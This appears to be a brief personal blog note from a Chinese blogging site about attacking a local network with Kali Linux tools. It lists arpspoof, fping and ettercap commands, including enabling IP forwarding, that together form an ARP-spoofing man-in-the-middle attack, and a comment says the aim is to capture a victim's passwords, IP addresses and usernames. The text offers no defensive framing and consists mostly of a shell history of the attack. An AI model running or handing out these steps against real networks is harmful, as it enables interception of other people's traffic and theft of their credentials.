美文网首页
kali attack(2016-09-02)

kali attack(2016-09-02)

作者: aiyolo | 来源:发表于2017-06-07 19:49 被阅读11次

arp attack

  • synopsis

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
arpspoof -i eth0 -t 192.168.0.102 192.168.0.1 //arp attack
fping -asg 192.198.0.1/24 //inquire the ip addr on lan( local are network)
fping -g 192.168.0.1/24
echo 1 > /proc/sys/net/ipv4/ip_forward//ip data packets redirect


ettercap

  • synopsis: If IPv6 is enabled:
    TARGET is in the form MAC/IPs/IPv6/PORTs
    Otherwise,
    TARGET is in the form MAC/IPs/PORTs
    where IPs and PORTs can be ranges (e.g. /192.168.0.1-30,40,50/20,22,25)

ettercap -Tq -i eth0 //when arp attack succeeds, we can use ettercap to acquire the datas of the host ,such as password ,ip ,username etc.

---

ifconfig
fping -g 192.168.0.1/24
arpspoof -i wlan0 -t 192.168.0.101 192.168.0.103
cd /proc/sys/net/ipv4
cat ip_forward
138 echo 1 > ip_forward
139 cat ip_forward
ettercap -Tq -i wlan0

相关文章

网友评论

      本文标题:kali attack(2016-09-02)

      本文链接:https://www.haomeiwen.com/subject/pepafxtx.html